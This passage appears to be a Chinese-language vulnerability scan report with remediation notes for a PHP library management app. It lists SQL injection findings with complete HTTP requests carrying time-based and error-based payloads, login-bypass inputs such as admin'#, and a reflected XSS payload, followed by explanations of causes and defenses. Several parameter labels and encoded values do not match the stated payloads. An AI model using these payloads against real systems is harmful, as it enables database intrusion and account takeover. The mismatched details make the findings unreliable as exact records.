Content-Length: 188
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456&press=123456&pressTime=&price=12%27and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27
18、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:ISBM
Payload: 123456'and(select*from(select+sleep(3))a/**/union/**/select+1)='
Request1: POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 188
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456%27and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27&author=123456&desc=123456&name=123456&press=123456&pressTime=&price=12
19、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=edit&id=1
ParamPosition:query
ParamKey:ID
Payload: extractvalue(1,concat(char(126),md5(1661479594)))
Request1: GET /?a=edit&c=Book&id=extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281661479594%29%29%29&p=Admin HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Referer: http://library/?p=Admin&c=Book&a=index
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
20、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:desc
Payload: 123456'and(select*from(select+sleep(3))a/**/union/**/select+1)='
Request1: POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 188
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456%27and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27&name=123456&press=123456&pressTime=&price=12
21、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:name
Payload: 123456'and(select*from(select+sleep(3))a/**/union/**/select+1)='
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 188
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456%27and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27&press=123456&pressTime=&price=12
22、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=edit&id=1
ParamPosition:query
ParamKey:identity
Payload: (select*from(select+sleep(5)union/**/select+1)a)
Request1:
GET /?a=edit&c=Book&id=%28select%2Afrom%28select%2Bsleep%280%29union%2F%2A%2A%2Fselect%2B1%29a%29&p=Admin HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Referer: http://library/?p=Admin&c=Book&a=index
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
23、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey: Publishing House
Payload: 123456'and(select*from(select+sleep(3))a/**/union/**/select+1)='
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 188
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456%27and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27&desc=123456&name=123456&press=123456&pressTime=&price=12
24、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:Title
Payload: 123456'and(select*from(select+sleep(3))a/**/union/**/select+1)='
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 188
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456%27and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27&desc=123456&name=123456&press=123456&pressTime=&price=12
25、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=index&keyword=5
ParamPosition: query
ParamKey: account
Payload: 5'and/**/extractvalue(1,concat(char(126),md5(1084451557)))and'
Request1:
GET /?a=index&c=Book&keyword=5%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281084451557%29%29%29and%27&p=Admin HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Referer: http://library/?p=Admin&c=Book&a=index
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
26、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=index&keyword=5
ParamPosition: query
ParamKey: Users
Payload: 5'and/**/extractvalue(1,concat(char(126),md5(1087653557)))and'
Request1:
GET /?a=index&c=Book&keyword=5%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281084451557%29%29%29and%27&p=Admin HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Referer: http://library/?p=Admin&c=Book&a=index
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
27、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=index&keyword=5
ParamPosition: query
ParamKey: keyword
Payload: 5'and/**/extractvalue(1,concat(char(126),md5(1084451557)))and'
Request1:
GET /?a=index&c=Book&keyword=5%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281084451557%29%29%29and%27&p=Admin HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Referer: http://library/?p=Admin&c=Book&a=index
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
28、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:Renew
Payload: 6-3'and/**/extractvalue(1,concat(char(126),md5(1600565407)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 187
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456&press=123456&pressTime=3%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281600565407%29%29%29and%27&price=12
29、SQL注入漏洞
URL: http://library/?p=Admin&c=Book&a=insert
ParamPosition:body
ParamKey:class
Payload: 6-3'and/**/extractvalue(1,concat(char(126),md5(1600565407)))and'
Request1:
POST /?p=Admin&c=Book&a=insert HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Content-Length: 187
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Origin: http://library
Referer: http://library/?p=Admin&c=Book&a=add
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
ISBN=123456&author=123456&desc=123456&name=123456&press=123456&pressTime=3%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281600565407%29%29%29and%27&price=12
项目中出现的SQL注入漏洞攻击及解决办法
1、弱口令漏洞
解决方案:使用至少6位的数字、字母及特殊字符组合作为密码。数据库不要存储明文密码,应存储加密后的密文。
2、未使用用户名及密码登录后台可直接输入后台URL登录系统。
解决方案:通过配置拦截器过滤掉无效用户的连接请求。
3、接口返回的信息中抛出的异常可能暴露程序信息。有经验的入侵者,可以从抛出的异常中获取很多信息,比如程序的部分架构、程序的物理路径、SQL注入爆出来的信息等。
解决方案:自定义一个Exception,将异常信息包装起来不要抛到页面上。
4、SQL注入
原理:SQL注入是一种将SQL代码添加到输入参数中,传递到服务器解析并执行的一种攻击手法。SQL注入攻击指的是通过构建特殊的输入作为参数传入,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而达到预想之外的一种行为,称之为SQL注入攻击。其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
4.1字符串注入:
有这样一个用户登录场景:登录界面包括用户名和密码输入框,以及提交按钮。输入用户名和密码然后提交。
这是一个post请求,登录时调用接口web/login.do,首先连接数据库,然后后台对post请求参数中携带的用户名、密码进行参数校验,即sql的查询过程。假设正确的用户名和密码为admin和pwd12345678,输入正确的用户名和密码、提交,相当于调用了以下的SQL语句:SELECT * FROM SYS_ADMIN WHERE NAME = 'admin' ADN password = 'pwd12345678'
由于用户名和密码都是字符串,SQL注入方法即把参数携带的数据变成mysql中注释的字符串。mysql中有2种注释的方法:
(1)'#':'#'后所有的字符串都会被当成注释来处理。用户名输入:admin'# (单引号闭合admin左边的单引号),密码随意输入,如:111,然后点击提交按钮。等价于SQL语句:
SELECT * FROM SYS_ADMIN WHERE NAME = 'admin'#' AND password = '111'#'后面都被注释掉了,相当于:SELECT * FROM SYS_ADMIN WHERE NAME = 'admin'。用户名输入:admin' OR NAME LIKE 'a%'# (单引号闭合a%左边的单引号),密码随意输入,如:abcd,然后点击提交按钮。等价于SQL语句:SELECT * FROM SYS_ADMIN
WHERE NAME = 'admin' OR NAME LIKE 'a%'#' AND password=' abcd '
'#'后面都被注释掉了,相当于:
SELECT * FROM SYS_ADMIN WHERE NAME = 'admin' OR NAME LIKE 'a%'
(2)'-- ' (--后面有个空格):'-- '后面的字符串都会被当成注释来处理。用户名输入:admin'-- (注意--后面有个空格,单引号闭合user左边的单引号),密码随意输入,如:111,然后点击提交按钮。等价于SQL语句:
SELECT * FROM SYS_ADMIN WHERE NAME = 'admin'-- ' AND password = '111'
SELECT * FROM SYS_ADMIN WHERE NAME = 'admin'-- ' AND password = '1111'
'-- '后面都被注释掉了,相当于:
SELECT * FROM SYS_ADMIN WHERE NAME = 'admin'
因此,这类情况可能输入一个错误的密码或者不输入密码就可登录用户名为'admin'的账号,这是十分危险的事情。
根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查询。基于此,SQL注入的产生原因通常表现在以下几方面:
1) 不当的类型处理;
2) 不安全的数据库配置;
3) 不合理的查询集处理;
4) 不当的错误处理;
5) 转义字符处理不合适;
6) 多个提交处理不当。
防护:
1)严格检查输入变量的类型和格式,对于整数参数,加判断条件:不能为空、参数类型必须为数字,对于字符串参数,可以使用正则表达式进行过滤:如:必须为[0-9a-zA-Z]范围内的字符串。
2)永远不要使用动态拼装sql,可以使用参数化的sql或者直接使用存储过程进行数据查询存取。
3)过滤和转义特殊字符, 在变量前进行转义,对'、"、\等特殊字符进行转义。
4)不要把机密信息直接存放,加密或者hash掉密码和敏感的信息。
5)应用的异常信息应该给出尽可能少的提示,最好使用自定义的错误信息对原始错误信息进行包装
6)利用mysql的预编译机制, 把sql语句的模板(变量采用占位符进行占位)发送给mysql服务器,mysql服务器对sql语句的模板进行编译,编译之后根据语句的优化分析对相应的索引进行优化,在最终绑定参数时把相应的参数传送给mysql服务器,直接进行执行,节省了sql查询时间,以及mysql服务器的资源,达到一次编译、多次执行的目的,除此之外,还可以防止SQL注入。具体是怎样防止SQL注入的呢?实际上当将绑定的参数传到mysql服务器,mysql服务器对参数进行编译,即填充到相应的占位符的过程中,做了转义操作。
SQL 漏洞的防护措施,主要有以下4种:
(1)在服务端根据用户输入构造 SQL 查询语句之前对用户提交数据的合法性进行检查;
(2)封装客户端提交信息;
(3)替换或删除敏感字符/字符串;
(4)屏蔽出错信息。
30、XSS漏洞
URL: http://library/?p=Admin&c=Book&a=edit&id=1
ParamPosition:query
ParamKey:id
Payload: <ScRiPt>alert(1)</sCrIpT>
Request1: GET /?a=edit&c=Book&id=%3CScRiPt%3Ejyissjtevr%3C%2FsCrIpT%3E&p=Admin HTTP/1.1
Host: library
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=kddm4qe9fe20nacmu3lqm9uuss
Referer: http://library/?p=Admin&c=Book&a=index
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
xss是一种跨站脚本,主要发生网站用户的浏览器中,是攻击者对浏览器注入恶意脚本改变网页的状态,当用户进行网页浏览时浏览器会对整个 html 进行渲染,并执行一些不被预期的恶意脚本,从而控制用户的浏览器 。xss是一种普遍存在的漏洞,攻击者可以利用xss漏洞对用户的浏览器进行攻击,可以使用静态文本或者动态文本的方式进行恶意代码的编写,从而载入到用户的计算机中。
项目中出现的xss漏洞攻击及解决办法:
- 反射型 xss:
反射型xss漏洞会出现在URL中,作为一种输入的方式提交到服务器中,当服务器发生响应后,这段xss代码将会出现在浏览器中,从而对用户的电脑进行攻击。
- DOM 型 xss
DOM 型 xss 是一种比较特殊的 xss 漏洞形式,只存在与客户端中,如果客户端脚本本身存在一定的结构缺陷,则当用户点击黑客的链接时会发生恶意攻击。
(3)存储型 xss对于存在一定缺点的 web服务器,攻击者会事先将恶意的代码存储到数据库中,当用户访问站点时,会从数据库中提取攻击者存储的恶意脚本,从而发生攻击事件,攻击者只需要进行一次攻击就可以完成多次攻击。
Xss漏洞修复方案:
- 输入编码转义:对输入的数据进行HTML转义,使其不会识别为可执行脚本。
- 白名单过滤根据白名单的标签和属性对数据进行过滤,以此来对可执行的脚本进行清除(如script标签,img标签的onerror属性等)
- XSS跨站漏洞的产生的根源是对前端输入的值以及输出的值进行全面的安全过滤,对一些非法的参数,像<>、,",'等进行自动转义,或者是强制的拦截并提示,过滤双引号,分好,单引号,对字符进行HTML实体编码操作,如果您对网站代码不是太懂,可以找专业的网站安全公司来修复XSS跨站漏洞,国内也就SINESAFE,深信服,绿盟,启明星辰比较专业,关于漏洞的修复办法,遵循的就是get,post,提交参数的严格过滤,对一些含有攻击特征的代码进行拦截。